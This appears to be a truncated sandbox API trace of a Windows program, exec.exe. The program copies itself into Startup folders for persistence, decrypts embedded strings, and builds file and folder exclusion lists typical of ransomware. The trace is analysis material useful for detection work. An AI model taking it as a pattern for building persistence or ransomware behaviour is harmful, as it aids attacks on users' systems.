[0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.964] SetLastError (dwErrCode=0x0) [0044.964] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] SetLastError (dwErrCode=0x0) [0044.965] GetLastError () returned 0x0 [0044.965] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe"), lpNewFileName="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), bFailIfExists=1) returned 0 [0044.966] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe"), lpNewFileName="c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe"), bFailIfExists=1) returned 1 [0044.972] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1580 | out: hHeap=0x8c0000) returned 1 [0044.972] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5670 | out: hHeap=0x8c0000) returned 1 [0044.972] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5888 | out: hHeap=0x8c0000) returned 1 [0044.972] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5aa0 | out: hHeap=0x8c0000) returned 1 [0044.973] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5cb8 | out: hHeap=0x8c0000) returned 1 [0044.973] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0044.973] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1500 | out: hHeap=0x8c0000) returned 1 [0044.973] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5480 | out: hHeap=0x8c0000) returned 1 [0044.973] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xc0) returned 0x8c1470 [0044.973] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb7c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afbe4 | out: phKey=0x1afbe4*=0x2e86f0) returned 1 [0044.973] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afbcc, dwFlags=0x0) returned 1 [0044.973] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afb98 | out: pbData=0x8c1470, pdwDataLen=0x1afb98) returned 1 [0044.973] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.974] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xbd) returned 0x8c1538 [0044.974] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1243033, lpParameter=0x8c1538, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb8 [0044.975] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0044.975] CloseHandle (hObject=0xb8) returned 1 [0044.975] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0044.975] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x60) returned 0x8c1470 [0044.975] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb88, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afbf0 | out: phKey=0x1afbf0*=0x2e86f0) returned 1 [0044.975] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afbd8, dwFlags=0x0) returned 1 [0044.975] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afba4 | out: pbData=0x8c1470, pdwDataLen=0x1afba4) returned 1 [0044.975] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.975] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x5c) returned 0x8c1600 [0044.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1243033, lpParameter=0x8c1600, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xb8 [0044.976] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x1388) returned 0x102 [0065.079] CloseHandle (hObject=0xb8) returned 1 [0065.080] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0065.080] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1718 [0065.080] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afbbc | out: phKey=0x1afbbc*=0x2ebcb0) returned 1 [0065.080] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0x1afba4, dwFlags=0x0) returned 1 [0065.080] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1718, pdwDataLen=0x1afb70 | out: pbData=0x8c1718, pdwDataLen=0x1afb70) returned 1 [0065.080] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0065.080] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1740 [0065.080] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c1470 [0065.080] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c1498 [0065.080] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb2c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb94 | out: phKey=0x1afb94*=0x2ebcb0) returned 1 [0065.080] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0x1afb7c, dwFlags=0x0) returned 1 [0065.080] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1498, pdwDataLen=0x1afb48 | out: pbData=0x8c1498, pdwDataLen=0x1afb48) returned 1 [0065.080] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0065.080] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0065.080] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1740, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0065.080] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0065.080] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1718 | out: hHeap=0x8c0000) returned 1 [0065.080] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x1afbfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1afbfc*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0065.080] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1740 | out: hHeap=0x8c0000) returned 1 [0065.080] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x28) returned 0x8c1718 [0065.080] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c1748 [0065.081] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa64, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afacc | out: phKey=0x1afacc*=0x2ebcb0) returned 1 [0065.081] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0x1afab4, dwFlags=0x0) returned 1 [0065.081] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1748, pdwDataLen=0x1afa80 | out: pbData=0x8c1748, pdwDataLen=0x1afa80) returned 1 [0065.081] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0065.081] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c1470 [0065.081] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa5c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afac4 | out: phKey=0x1afac4*=0x2ebcb0) returned 1 [0065.081] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0x1afaac, dwFlags=0x0) returned 1 [0065.081] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afa78 | out: pbData=0x8c1470, pdwDataLen=0x1afa78) returned 1 [0065.081] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0065.081] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c1488 [0065.081] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afabc | out: phKey=0x1afabc*=0x2ebcb0) returned 1 [0065.081] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0x1afaa4, dwFlags=0x0) returned 1 [0065.081] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1488, pdwDataLen=0x1afa70 | out: pbData=0x8c1488, pdwDataLen=0x1afa70) returned 1 [0065.081] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0065.081] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c14a0 [0065.081] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa4c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afab4 | out: phKey=0x1afab4*=0x2ebcb0) returned 1 [0065.081] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0x1afa9c, dwFlags=0x0) returned 1 [0065.081] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14a0, pdwDataLen=0x1afa68 | out: pbData=0x8c14a0, pdwDataLen=0x1afa68) returned 1 [0065.081] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0065.082] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c5480 [0065.082] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa44, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afaac | out: phKey=0x1afaac*=0x2ebcb0) returned 1 [0065.082] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0x1afa94, dwFlags=0x0) returned 1 [0065.082] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5480, pdwDataLen=0x1afa60 | out: pbData=0x8c5480, pdwDataLen=0x1afa60) returned 1 [0065.082] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0065.082] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c14b8 [0065.082] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afaa4 | out: phKey=0x1afaa4*=0x2ebcb0) returned 1 [0065.082] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0x1afa8c, dwFlags=0x0) returned 1 [0065.082] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14b8, pdwDataLen=0x1afa58 | out: pbData=0x8c14b8, pdwDataLen=0x1afa58) returned 1 [0065.082] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0065.082] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x70) returned 0x8c5518 [0065.082] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa34, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa9c | out: phKey=0x1afa9c*=0x2ebcb0) returned 1 [0065.082] CryptSetKeyParam (hKey=0x2ebcb0, dwParam=0x1, pbData=0x1afa84, dwFlags=0x0) returned 1 [0065.082] CryptDecrypt (in: hKey=0x2ebcb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c5518, pdwDataLen=0x1afa50 | out: pbData=0x8c5518, pdwDataLen=0x1afa50) returned 1 [0065.082] CryptDestroyKey (hKey=0x2ebcb0) returned 1 [0065.083] htonl (hostlong=0x9c354b42) returned 0x424b359c [0065.083] CryptGenRandom (in: hProv=0x2e4fe0, dwLen=0x20, pbBuffer=0x1afb90 | out: pbBuffer=0x1afb90) returned 1 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x28) returned 0x8c14d0 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c1500 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x4) returned 0x8c1518 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x14) returned 0x8c5590 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c55b0 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x80) returned 0x8c55c8 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c5650 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x82) returned 0x8c5668 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c56f8 [0065.083] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x4) returned 0x8c1528 [0065.083] CryptAcquireContextW (in: phProv=0x124fcf4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x124fcf4*=0x2e8438) returned 1 [0065.087] CryptGenRandom (in: hProv=0x2e8438, dwLen=0x55, pbBuffer=0x1afafa | out: pbBuffer=0x1afafa) returned 1 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c5710 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x80) returned 0x8c5728 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c57b0 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x2) returned 0x8c57c8 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x4) returned 0x8c57d8 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c57e8 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x80) returned 0x8c5800 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c5888 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x4) returned 0x8c58a0 [0065.087] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c57c8, Size=0x82) returned 0x8c58b0 [0065.087] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c58a0, Size=0x100) returned 0x8c5940 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0x8c5a48 [0065.087] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x82) returned 0xd36b90 [0065.088] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36c20 [0065.088] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x82) returned 0xd36c38 [0065.088] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0xd36b90, Size=0x104) returned 0xd36cc8 [0065.088] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c55c8, Size=0x100) returned 0xd36dd8 [0065.088] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c58b0, Size=0x104) returned 0xd36ee0 [0065.088] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c5940, Size=0x200) returned 0xd36ff0 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c57d8 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36ff0 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5888 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5728 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5710 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5800 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c57e8 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36ee0 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c57b0 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36cc8 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5a48 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36c38 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36c20 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1518 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1500 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5668 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5650 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd36dd8 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c55b0 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1528 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c56f8 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d0 | out: hHeap=0x8c0000) returned 1 [0065.089] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c5590 | out: hHeap=0x8c0000) returned 1 [0065.089] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xa4) returned 0x8c5590 [0065.089] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x62) returned 0x8c5640 [0065.089] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, Ptr=0x8c5640, Size=0xc2) returned 0x8c5640 [0065.089] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36ba8 [0065.089] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xb40) returned 0xd37390 [0065.090] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa2c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa94 | out: phKey=0x1afa94*=0x2ebcf0) returned 1 [0065.090] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa7c, dwFlags=0x0) returned 1 [0065.090] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd37390, pdwDataLen=0x1afa48 | out: pbData=0xd37390, pdwDataLen=0x1afa48) returned 1 [0065.090] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.090] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x10) returned 0xd36bc0 [0065.090] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afa24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa8c | out: phKey=0x1afa8c*=0x2ebcf0) returned 1 [0065.090] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa74, dwFlags=0x0) returned 1 [0065.090] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd36bc0, pdwDataLen=0x1afa40 | out: pbData=0xd36bc0, pdwDataLen=0x1afa40) returned 1 [0065.090] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.090] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0xd37ed8 [0065.090] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1af9fc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa64 | out: phKey=0x1afa64*=0x2ebcf0) returned 1 [0065.090] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa4c, dwFlags=0x0) returned 1 [0065.090] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xd37ed8, pdwDataLen=0x1afa18 | out: pbData=0xd37ed8, pdwDataLen=0x1afa18) returned 1 [0065.090] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.090] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x84) returned 0x8c5710 [0065.090] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x84) returned 0x8c9798 [0065.090] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c57a0 [0065.090] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1af9d4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa3c | out: phKey=0x1afa3c*=0x2ebcf0) returned 1 [0065.090] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa24, dwFlags=0x0) returned 1 [0065.090] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c57a0, pdwDataLen=0x1af9f0 | out: pbData=0x8c57a0, pdwDataLen=0x1af9f0) returned 1 [0065.090] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.091] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c57a0 | out: hHeap=0x8c0000) returned 1 [0065.091] ExpandEnvironmentStringsW (in: lpSrc="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys", lpDst=0x8c5710, nSize=0x42 | out: lpDst="info.hta;info.txt;boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys") returned 0x42 [0065.091] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c9798 | out: hHeap=0x8c0000) returned 1 [0065.091] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd37ed8 | out: hHeap=0x8c0000) returned 1 [0065.091] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x60) returned 0x8c14d0 [0065.091] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1af9f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa60 | out: phKey=0x1afa60*=0x2ebcf0) returned 1 [0065.091] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa48, dwFlags=0x0) returned 1 [0065.091] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14d0, pdwDataLen=0x1afa14 | out: pbData=0x8c14d0, pdwDataLen=0x1afa14) returned 1 [0065.091] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.091] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x5c) returned 0xd37ed8 [0065.091] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x5c) returned 0xd37f40 [0065.091] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c57a0 [0065.091] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1af9d0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afa38 | out: phKey=0x1afa38*=0x2ebcf0) returned 1 [0065.091] CryptSetKeyParam (hKey=0x2ebcf0, dwParam=0x1, pbData=0x1afa20, dwFlags=0x0) returned 1 [0065.091] CryptDecrypt (in: hKey=0x2ebcf0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c57a0, pdwDataLen=0x1af9ec | out: pbData=0x8c57a0, pdwDataLen=0x1af9ec) returned 1 [0065.091] CryptDestroyKey (hKey=0x2ebcf0) returned 1 [0065.091] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c57a0 | out: hHeap=0x8c0000) returned 1 [0065.091] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows;Program Files;Program Files (x86);", lpDst=0xd37ed8, nSize=0x2e | out: lpDst="C:\\Windows;Program Files;Program Files (x86);") returned 0x2e [0065.091] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0xd37f40 | out: hHeap=0x8c0000) returned 1 [0065.091] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14d0 | out: hHeap=0x8c0000) returned 1 [0065.091] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0x8c57a0 [0065.091] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20a) returned 0x8cb780 [0065.091] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8cb780, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\exec.exe")) returned 0x2e [0065.091] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8cb780 | out: hHeap=0x8c0000) returned 1 [0065.091] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0xb38) returned 0x8cb780 [0065.092] GetLastError () returned 0x0 [0065.092] RtlReAllocateHeap (Heap=0x8c0000, Flags=0x0, 